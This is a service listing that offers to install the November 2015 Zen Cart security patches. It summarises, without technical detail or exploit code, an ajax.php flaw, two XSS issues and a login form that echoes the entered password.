Zen Cart 11-26-2015 Security Patches
This patch is for Zen Cart 1.3.X - 1.5.4.
We will apply the following patches, as needed for versions. Please note that extreme customization of the affected files could incur additional cost, which would be disclosed before you are billed.
1. Problem with /ajax.php in v1.5.4 only - Severity: High
In Zen Cart v1.5.4 the /ajax.php file has a vulnerability which can be used to cause a server exploit under very specific conditions.
The patch is simple: replace the /ajax.php file.
Below are some additional lower-severity patches affecting prior versions, as well as 1.5.4, which should be reviewed carefully for your site, to merge with existing customizations you may have made:
2. XSS problem for unsanitized comment field - Severity: Medium
In Zen Cart versions up to and including v1.5.4 an XSS problem exists with the order-comments field.
The fix for this is a simple one-line patch to /includes/modules/pages/checkout_confirmation/header_php.php..
The attached checkout_confirmation header_php.php is for v1.3.9-thru-v1.5.4 only. Older versions should be patched manually using code merging.
Patched file: /includes/modules/pages/checkout_confirmation/header_php.php
3. Failed customer login puts password back in input box - Severity: Low
When attempting a login with an invalid password, the resulting response contains that invalid password.
The fix for this is a edit and merged code to the /includes/functions/html_output.php file.
For v1.5.4 one can apply the attached html_output.php file to /includes/functions/html_output.php ... or if you've customized that file via plugins, use the above code-diff link to find the one line to change.
Thanks to Trustwave Security for alerting us to this issue.
Patched file: /includes/functions/html_output.php
4. XSS concerns on the Admin side - because of working CSRF protections. Severity: Low
Trustwave Security has reported that some fields on admin edit screens are at risk of XSS exploitation. A patch is being prepared, but it is important to note that none of these concerns can be exploited without having a valid Admin login already. So, the problems could only be caused by persons already having permission to access the admin area and intentionally placing malicious code into the affected fields. The Zen Cart Admin area is already protected against CSRF vulnerabilities so these XSS issues cannot be exploited by third parties.
A further announcement will be posted when the patch is ready.
There are core file edits and several new files. In order to complete this installation we will need both credentials. Do not put these credentials in checkout or email, we will send you a secure form to collect the necessary information.